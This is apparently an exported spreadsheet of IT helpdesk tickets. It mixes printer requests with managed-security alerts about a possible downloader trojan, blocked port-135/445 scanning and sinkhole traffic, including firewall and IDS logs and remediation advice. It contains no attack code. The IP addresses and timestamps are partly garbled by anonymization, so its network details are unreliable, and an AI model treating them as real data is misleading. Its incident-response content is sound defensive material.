    <t>as per inc1530176::security incidents - (in33536629) : possible trojan infection - host: 10.44.94.214</t>
  </si>
  <si>
    <t xml:space="preserve">
from: gzhapcld fdigznbk 
sent: wednesday, august 10, 2016 1:19 am
to: jenfrgryui lu
cc: sam wanrtyg; stefytyn shi; cothyshy wu; qfrntose ivnhumzjalakrisyuhnyrtn; nyrjkctu tbhkenlo; ugyothfz ugrmkdhx; suhtnhdyio psfshytd; kathght shfhyw; bhayhtrathramdnty mamilujli
subject: inc1530176::security incidents - (in33536629) : possible trojan infection - host: 10.44.94.214
hello jenfrgryui,
we are getting alerts possible downloader trojan from your 80.68.49.4169(user id: lughjm)  device sourcing from 10.44.94.214 and destined to host 183.91.33.90, indicating that host 10.44.94.214 may be infected with malware.
due to the nature of this threat, it may be difficult to detect the compromise. because of the detection difficulty and severity of the threat, dell secureworks recommends that we remove the pc off the network at the earliest, format the hard drive and install a new system. it is not reliable to attempt to clean the virus.
in the meantime, as this is a high severity issue we are moving the corresponding account (user id: lughjm) to palo_virus_quarantine group. (no internet access). 
common ways that computers become infected are listed below. please inform our team if you know how your pc may have become infected
1)     using a portable usb drive (also known as "pen drive" or "thumb drive").
2)     clicking a phishing email link.
3)     visiting websites that may have been compromised by a hacker.
hello apac pc services,
after the pc has been re-imaged with immediate effect. please let us know .
we have created a ticketing_tool ticket and assigned it to europe pc services.  inc1530176
</t>
  </si>
  <si>
    <t>security incidents - ( dsw #in33390850 ) : suspicious ms-rpc/ms-ds/netbios activity - ( HostName_1270 / 78.83.16.293 )</t>
  </si>
  <si>
    <t>source ip : 78.83.16.293
system name : HostName_1270 - santiago,south amerirtca - backup exec server
user  name: uidgt olibercsu (olvidley)
location : santiago,south amerirtca
sep , sms status : see below
field sales user ( yes / no) : no
dsw event log: see below
**
content versions
fmxcnwpu tcwrdqboinition version: 08/08/2016 r19 
sequence: 179828 
host integrity content: not available 
reputation settings: 03/02/2015 r5 
ap portal list: 11/11/2015 r22 
intrusion prevention signature: 08/08/2016 r11 
power eraser definitions: 10/28/2015 r36 
revocation content: 08/03/2016 r2 
eraser engine: 115.2.1.18 
sonar content: 07/18/2016 r1 
extended file attributes and signatures: 07/26/2016 r2 
symantec permitted applications list: 08/08/2016 r3 
=========================
incident overview
=========================
we have detected at least 225 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1270/78.83.16.293 and destined to port 135 of one or more destination devices. this activity may indicate one of the following:
 1. an infection on this host
 2. a misconfigured firewall
 3. a misconfigured host
 4. port scan (authorized or unauthorized)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1) ticket only escalation for these alerts where the traffic was blocked (explicit notification via a medium priority ticket (no phone call))
2) automatically resolve these alerts where the traffic was blocked to the portal (no explicit notification but events will be available for reporting purposes in the portal)
sincerely,
dell secureworks soc
=========================
technical details
=========================
historically, there have been various worms/malware that have used ports 135, 137, 138, 139, and 445 to propagate. examples include:
-w32.blaster.worm/msblast/lovsan 
-w32.welchia/nachi
-w32.reatle
port 135 - microsoft epmap (end point mapper), also known as dce/rpc locator service
port 137 - netbios netbios name service
port 138 - netbios netbios datagramdnty service
port 139 - netbios netbios session service
port 445 - microsoft-ds smb file sharing
additional information on these ports and best practices can be found at the following sites:
=========================
references
=========================
=========================
event data
=========================
related events: 
___________________________________________________________________________
event id: 27927493
event summary: internal outbreak for 135/tcp
log time: 2016-07-24 at 20:21:46
source ip: 78.83.16.293
source hostname: HostName_1270
destination hostname: 
device ip: 18.79.63.203
device name: company-internal-asa.company.com-1
event extra data:
inspectorruleid = 186739
sherlockruleid = 537074
cvss = -1
ontologyid = 200020003203009144
srchostname = HostName_1270
eventtypeid = 200020003203009044
ctainstanceid = 0
foreseeglobalmodelassessmt = unknown
irreceivedtime = 1469392610163
foreseemalprobglobalmodel = 0.6162829
inspectoreventid = 018319585
eventtypepriority = 1
proto = tcp
dstport = 135
action = blocked
ileatdatacenter = true
foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;
foreseeinternalip = 78.83.16.293
logtimestamp = 2570402817
agentid = 103611
foreseeconndirection = internal
srcassetofinterest = 4
srcport = 59908
occurrence count: 225
event count: 2
event detail:
jul 24 20:21:46 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59908 to 192.168.2.123/135 flags syn  on interface inside
jul 24 20:21:52 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59920 dst outside:192.168.43.161/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:21:55 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59927 dst outside:192.168.0.146/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:21:56 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59929 dst outside:192.168.0.16/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:22:02 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59949 to 192.168.2.21/135 flags syn  on interface inside
jul 24 20:22:04 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59952 dst outside:192.168.0.23/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:22:3sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60005 dst outside:10.10.11.26/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:22:35 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60011 dst outside:192.168.0.5/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:22:44 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60018 to 192.168.2.19/135 flags syn  on interface inside
jul 24 20:23:09 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60066 dst outside:172.40.1.98/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60070 dst outside:192.168.0.39/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:23:15 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60083 to 192.168.2.150/135 flags syn  on interface inside
jul 24 20:23:16 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60086 dst outside:192.168.178.139/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:23:19 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60095 dst outside:192.168.0.101/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60116 dst outside:192.168.0.2/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60117 dst outside:192.168.0.22/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
___________________________________________________________________________
event id: 27927405
event summary: internal outbreak for 445/tcp
log time: 2016-07-24 at 20:21:46
source ip: 78.83.16.293
source hostname: HostName_1270
destination hostname: 
device ip: 18.79.63.203
device name: company-internal-asa.company.com-1
event extra data:
inspectorruleid = 186739
sherlockruleid = 537074
cvss = -1
ontologyid = 200020003203009144
srchostname = HostName_1270
eventtypeid = 200020003203009044
ctainstanceid = 0
foreseeglobalmodelassessmt = unknown
irreceivedtime = 1469392610163
foreseemalprobglobalmodel = 0.6162829
inspectoreventid = 018319585
eventtypepriority = 1
proto = tcp
dstport = 135
action = blocked
ileatdatacenter = true
foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;
foreseeinternalip = 78.83.16.293
logtimestamp = 2570402817
agentid = 103611
foreseeconndirection = internal
srcassetofinterest = 4
srcport = 59908
occurrence count: 225
event count: 2
event detail:
jul 24 20:21:53 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59925 dst outside:192.168.43.161/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:21:57 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59931 dst outside:192.168.0.146/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:21:58 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59936 dst outside:192.168.0.16/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:22:06 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59955 dst outside:192.168.0.23/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:22:10 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59956 to 192.168.2.123/445 flags syn  on interface inside
jul 24 20:22:23 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59986 to 192.168.2.21/445 flags syn  on interface inside
jul 24 20:22:32 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60008 dst outside:10.10.11.26/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:22:37 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60012 dst outside:192.168.0.5/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:23:05 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60056 to 192.168.2.19/445 flags syn  on interface inside
jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60069 dst outside:172.40.1.98/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:23:12 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60074 dst outside:192.168.0.39/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:23:18 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60090 dst outside:192.168.178.139/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:23:2sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60099 dst outside:192.168.0.101/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60122 dst outside:192.168.0.2/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60123 dst outside:192.168.0.22/445 by access-group "acl_inside" [0xac2286bc, 0x0]
jul 24 20:23:36 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60135 to 192.168.2.150/445 flags syn  on interface inside</t>
  </si>
  <si>
    <t>HostName_1132:epmsystem2.exe: wrong number of instances of process *epmsystem2.exe*, expected 2 - found 1</t>
  </si>
  <si>
    <t>observing below alert in reporting_tool since 1:33 pm on 08/09 et. note that we have opened a ticket (inc1539097 )earlier for the same issue but looks like that time issue was resolved.
epmsystem2.exe: wrong number of instances of process *epmsystem2.exe*, expected 2 - found 1</t>
  </si>
  <si>
    <t>source ip : 78.83.16.293_x000D_
system name : HostName_1270 - santiago,south amerirtca - backup exec server_x000D_
user  name: uidgt olibercsu (olvidley)_x000D_
location : santiago,south amerirtca_x000D_
sep , sms status : see below_x000D_
field sales user ( yes / no) : no_x000D_
dsw event log: see below_x000D_
_x000D_
**_x000D_
_x000D_
content versions_x000D_
fmxcnwpu tcwrdqboinition version: 08/08/2016 r19 _x000D_
sequence: 179828 _x000D_
host integrity content: not available _x000D_
reputation settings: 03/02/2015 r5 _x000D_
ap portal list: 11/11/2015 r22 _x000D_
intrusion prevention signature: 08/08/2016 r11 _x000D_
power eraser definitions: 10/28/2015 r36 _x000D_
revocation content: 08/03/2016 r2 _x000D_
eraser engine: 115.2.1.18 _x000D_
sonar content: 07/18/2016 r1 _x000D_
extended file attributes and signatures: 07/26/2016 r2 _x000D_
symantec permitted applications list: 08/08/2016 r3 _x000D_
_x000D_
=========================_x000D_
incident overview_x000D_
=========================_x000D_
we have detected at least 225 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1270/78.83.16.293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dell secureworks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____________________________________________________________________________x000D_
event id: 27927493_x000D_
event summary: internal outbreak for 135/tcp_x000D_
log time: 2016-07-24 at 20:21:46_x000D_
source ip: 78.83.16.293_x000D_
source hostname: HostName_1270_x000D_
destination hostname: _x000D_
device ip: 18.79.63.203_x000D_
device name: company-internal-asa.company.com-1_x000D_
event extra data:_x000D_
inspectorruleid = 186739_x000D_
sherlockruleid = 537074_x000D_
cvss = -1_x000D_
ontologyid = 200020003203009144_x000D_
srchostname = HostName_1270_x000D_
eventtypeid = 200020003203009044_x000D_
ctainstanceid = 0_x000D_
foreseeglobalmodelassessmt = unknown_x000D_
irreceivedtime = 1469392610163_x000D_
foreseemalprobglobalmodel = 0.6162829_x000D_
inspectoreventid = 018319585_x000D_
eventtypepriority = 1_x000D_
proto = tcp_x000D_
dstport = 135_x000D_
action = blocked_x000D_
ileatdatacenter = true_x000D_
foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;_x000D_
foreseeinternalip = 78.83.16.293_x000D_
logtimestamp = 2570402817_x000D_
agentid = 103611_x000D_
foreseeconndirection = internal_x000D_
srcassetofinterest = 4_x000D_
srcport = 59908_x000D_
_x000D_
_x000D_
occurrence count: 225_x000D_
event count: 2_x000D_
_x000D_
event detail:_x000D_
jul 24 20:21:46 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59908 to 192.168.2.123/135 flags syn  on interface inside_x000D_
jul 24 20:21:52 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59920 dst outside:192.168.43.161/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:21:55 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59927 dst outside:192.168.0.146/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:21:56 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59929 dst outside:192.168.0.16/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:22:02 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59949 to 192.168.2.21/135 flags syn  on interface inside_x000D_
jul 24 20:22:04 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59952 dst outside:192.168.0.23/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:22:3sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60005 dst outside:10.10.11.26/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:22:35 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60011 dst outside:192.168.0.5/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:22:44 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60018 to 192.168.2.19/135 flags syn  on interface inside_x000D_
jul 24 20:23:09 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60066 dst outside:172.40.1.98/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60070 dst outside:192.168.0.39/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:23:15 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60083 to 192.168.2.150/135 flags syn  on interface inside_x000D_
jul 24 20:23:16 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60086 dst outside:192.168.178.139/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:23:19 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60095 dst outside:192.168.0.101/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60116 dst outside:192.168.0.2/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60117 dst outside:192.168.0.22/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
event id: 27927405_x000D_
event summary: internal outbreak for 445/tcp_x000D_
log time: 2016-07-24 at 20:21:46_x000D_
source ip: 78.83.16.293_x000D_
source hostname: HostName_1270_x000D_
destination hostname: _x000D_
device ip: 18.79.63.203_x000D_
device name: company-internal-asa.company.com-1_x000D_
event extra data:_x000D_
inspectorruleid = 186739_x000D_
sherlockruleid = 537074_x000D_
cvss = -1_x000D_
ontologyid = 200020003203009144_x000D_
srchostname = HostName_1270_x000D_
eventtypeid = 200020003203009044_x000D_
ctainstanceid = 0_x000D_
foreseeglobalmodelassessmt = unknown_x000D_
irreceivedtime = 1469392610163_x000D_
foreseemalprobglobalmodel = 0.6162829_x000D_
inspectoreventid = 018319585_x000D_
eventtypepriority = 1_x000D_
proto = tcp_x000D_
dstport = 135_x000D_
action = blocked_x000D_
ileatdatacenter = true_x000D_
foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;_x000D_
foreseeinternalip = 78.83.16.293_x000D_
logtimestamp = 2570402817_x000D_
agentid = 103611_x000D_
foreseeconndirection = internal_x000D_
srcassetofinterest = 4_x000D_
srcport = 59908_x000D_
_x000D_
_x000D_
occurrence count: 225_x000D_
event count: 2_x000D_
_x000D_
event detail:_x000D_
jul 24 20:21:53 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59925 dst outside:192.168.43.161/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:21:57 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59931 dst outside:192.168.0.146/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:21:58 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59936 dst outside:192.168.0.16/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:22:06 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59955 dst outside:192.168.0.23/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:22:10 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59956 to 192.168.2.123/445 flags syn  on interface inside_x000D_
jul 24 20:22:23 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59986 to 192.168.2.21/445 flags syn  on interface inside_x000D_
jul 24 20:22:32 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60008 dst outside:10.10.11.26/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:22:37 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60012 dst outside:192.168.0.5/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:23:05 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60056 to 192.168.2.19/445 flags syn  on interface inside_x000D_
jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60069 dst outside:172.40.1.98/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:23:12 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60074 dst outside:192.168.0.39/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:23:18 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60090 dst outside:192.168.178.139/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:23:2sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60099 dst outside:192.168.0.101/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60122 dst outside:192.168.0.2/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60123 dst outside:192.168.0.22/445 by access-group "acl_inside" [0xac2286bc, 0x0]_x000D_
jul 24 20:23:36 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60135 to 192.168.2.150/445 flags syn  on interface inside</t>
  </si>
  <si>
    <t>ariqehvd fhrpontd</t>
  </si>
  <si>
    <t xml:space="preserve">add printer prtqi2019 on HostName_1332   </t>
  </si>
  <si>
    <t>add printer prtqi2019 on HostName_1332 with 32 and 64 bit drivers._x000D_
_x000D_
model - hp laser jet 4350dn_x000D_
dynamic ip address - _x000D_
fqdn: prtqi2019_x000D_
short name: SID_99_x000D_
print server: \\HostName_1332</t>
  </si>
  <si>
    <t>security incidents - (in33536629) : possible trojan infection - host: 10.44.94.214</t>
  </si>
  <si>
    <t>source ip :10.44.94.214_x000D_
dest ip : 183.91.33.90_x000D_
system name :apul8811851_x000D_
user  name: jenfrgryui lu_x000D_
location : singapore _x000D_
sep , sms status :given below_x000D_
field sales user ( yes / no) :  no_x000D_
dsw event log: see below_x000D_
--------------------------------------------------------------_x000D_
=========================_x000D_
 event details_x000D_
=========================_x000D_
event detail(s):_x000D_
_x000D_
event_id 91201861:_x000D_
[**] [1:21130977:10] 29866 vid22518 bare http get executable from ip address (possible downloader trojan) [**]_x000D_
[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 606873][event id: 722700][time: 2581693432.277667]_x000D_
[xref =&gt; vid, 22518]_x000D_
[src ip: 10.44.94.214][dst ip: 183.91.33.90][sport/itype: 64193][dport/icode: 80][proto: 6]_x000D_
08/07/2016-15:05:21.277667 10.44.94.214:64193 -&gt; 183.91.33.90:80_x000D_
tcp ttl:127 tos:0x0 id:13388 iplen:20 dgmlen:187 df_x000D_
***ap*** seq: 0x64eb7c89 ack: 0xe070c15e win: 0x40b0 tcplen: 20_x000D_
==pcap s==_x000D_
=0c=00=00=001n=a7w=a3&lt;=04=00=bb=00=00=00=bb=00=00=00e=00=00=bb4l@=00=7f=06=859=0a,^=d6=b7[!z=fa=c1=00pd=eb|=89=e0p=c1^p=18@=b0=f7=c3=00=00get /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe http/1.1=0d=0aconnection: keep-alive=0d=0acache-control: no-cache=0d=0ahost: 183.91.33.90=0d=0a=0d=0a_x000D_
==pcap e==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe]_x000D_
_x000D_
[ex http_hostname 10: 183.91.33.90]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
[correlation_data]_x000D_
aug 7 10:38:22 46.45.62.5146 dhcpd[9675]: dhcpack on 10.44.94.214 to 40:04:b1:49:b3:75 (apul8811851) via eth2 relay 10.44.94.1 lease-duration 43200_x000D_
_x000D_
refererproxycorrelationurl : null_x000D_
ileatdatacenter : true_x000D_
host : 183.91.33.90_x000D_
cvss : -1_x000D_
foreseeconndirection : outgoing_x000D_
foreseeexternalip : 183.91.33.90_x000D_
eventtypeid : 200020003203113798_x000D_
netacuity_destination_isp : no.31 jin-rong street_x000D_
srchostname : apul8811851_x000D_
logtimestamp : 2581693432_x000D_
urlhost : 183.91.33.90_x000D_
proto : tcp_x000D_
urlfullpath : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000D_
unique_event_hash : 854336076_x000D_
device_network_type : internal_x000D_
srcport : 64193_x000D_
urlcorrelation : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000D_
dstip : 183.91.33.90_x000D_
httpversion : http/1.1_x000D_
url : 183.91.33.90/pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000D_
vendorpriority : 2_x000D_
httpmethod : get_x000D_
ontologyid : 200020003203728796_x000D_
vendorreference : vid, 22518_x000D_
eventtypepriority : 3_x000D_
devip : 80.68.49.4169_x000D_
source_network_type : internal_x000D_
inspectorruleid : 277082_x000D_
lowercaseurlcorrelation : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000D_
sherlockruleid : 690393_x000D_
inlineaction : 2_x000D_
urlpath : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000D_
srcmacaddress : 40:04:b1:49:b3:75_x000D_
inspectoreventid : 876354922_x000D_
srcip : 10.44.94.214_x000D_
globalproxycorrelationurl : explorer15_x000D_
tcpflags : ***ap***_x000D_
vendoreventid : 722700_x000D_
foreseemaliciouscomment : null or empty model found;evaluationmodels-&gt;ngm:0.7587:0.0084;_x000D_
foreseeinternalip : 10.44.94.214_x000D_
foreseedstipgeo : hong kong,hkg_x000D_
dstport : 80_x000D_
device_id : 2559974_x000D_
action : not blocked_x000D_
event_summary : 29866 vid22518 bare http get executable from ip address (possible downloader trojan)_x000D_
irreceivedtime : 1470582706714_x000D_
vendorversion : 7_x000D_
netacuity_destination_organization : apacnet hongkong region network_x000D_
agentid : 102835_x000D_
ctainstanceid : 0</t>
  </si>
  <si>
    <t xml:space="preserve">
name:seghyurghei
language:
browser:microsoft internet explorer
email:mfeyouli.ndobtzpw@gmail.com
customer number:
telephone:
summary:trying to connect a printer</t>
  </si>
  <si>
    <t>security incidents - ( dsw #in33407676 ) : traffic from sinkhole domain to ( lpawx210968sf / 61.01.52.02617 )</t>
  </si>
  <si>
    <t>source ip : 61.01.52.02617_x000D_
system name : lpawx210968sf_x000D_
user  name: n/a_x000D_
location : indaituba_x000D_
sep , sms status : n/a_x000D_
field sales user ( yes / no) :  no_x000D_
dsw event log: see below_x000D_
_x000D_
**_x000D_
_x000D_
=========================_x000D_
incident overview_x000D_
=========================_x000D_
we are seeing your 10.32.100.17/isensor03.company.com device generating '51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset' alerts for traffic (not blocked) from port 80/tcp of 195.38.137.100 to port 3720/tcp of your lpawx210968sf/61.01.52.02617 device indicating that the host is most likely infected with malware. _x000D_
_x000D_
this return traffic indicates that lpawx210968sf/61.01.52.02617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infection._x000D_
_x000D_
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1) ticket only escalation for sinkhole domain alerts (explicit notification via a medium priority ticket (no phone call))_x000D_
2) auto-resolve sinkhole domain alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000D_
_x000D_
sincerely,_x000D_
secureworks soc_x000D_
_x000D_
_x000D_
=========================_x000D_
technical details_x000D_
=========================_x000D_
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_x000D_
_x000D_
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suite._x000D_
_x000D_
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sort._x000D_
_x000D_
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"company x is infected with y", which may lead to reputational damage._x000D_
_x000D_
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_x000D_
_x000D_
_x000D_
=========================_x000D_
references_x000D_
=========================_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
____________________________________________________________________________x000D_
event id: 303133902_x000D_
event summary: 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset_x000D_
log time: 2016-08-04 at 10:59:36_x000D_
source ip: 195.38.137.100_x000D_
destination ip: 61.01.52.02617_x000D_
destination hostname: lpawx210968sf_x000D_
device ip: 10.32.100.17_x000D_
device name: isensor03.company.com_x000D_
event extra data:_x000D_
sherlockruleid = 699417_x000D_
cvss = -1_x000D_
ctainstanceid = 0_x000D_
irreceivedtime = 1470308771682_x000D_
httpstatuscode = 302_x000D_
inspectoreventid = 028504841_x000D_
eventtypepriority = 4_x000D_
dstassetofinterest = 416_x000D_
globalproxycorrelationurl = null_x000D_
foreseeinternalip = 61.01.52.02617_x000D_
logtimestamp = 2582520598_x000D_
foreseeconndirection = incoming_x000D_
foreseeexternalip = 195.38.137.100_x000D_
inlineaction = 2_x000D_
ontologyid = 200020003203753900_x000D_
foreseesrcipgeo = franhtyufurt am main,deu_x000D_
eventtypeid = 200020003203560456_x000D_
dsthostname = lpawx210968sf_x000D_
vendoreventid = 271147_x000D_
vendorpriority = 2_x000D_
tcpflags = ***ap***_x000D_
proto = tcp_x000D_
dstport = 3720_x000D_
action = not blocked_x000D_
ileatdatacenter = true_x000D_
foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;ngm:0.1987:0.004;_x000D_
httpcontenttype = text/html_x000D_
vendorversion = 7_x000D_
refererproxycorrelationurl = null_x000D_
agentid = 102805_x000D_
srcport = 80_x000D_
_x000D_
_x000D_
occurrence count: 7_x000D_
event count: 1_x000D_
_x000D_
event detail:_x000D_
[**] [1:21162804:2] 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset [**]_x000D_
[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 602982][event id: 271147][time: 2582520598.52167]_x000D_
[src ip: 195.38.137.100][dst ip: 61.01.52.02617][sport/itype: 80][dport/icode: 3720][proto: 6]_x000D_
08/04/2016-10:59:36.052167 195.38.137.100:80 -&gt; 61.01.52.02617:3720_x000D_
tcp ttl:45 tos:0x0 id:52866 iplen:20 dgmlen:386 df_x000D_
***ap*** seq: 0xf1729be0  ack: 0xcc94106  win: 0x687f  tcplen: 20_x000D_
==pcap 1==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /]_x000D_
_x000D_
[ex http_hostname 10: futureinterest.org]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
ascii packet(s):_x000D_
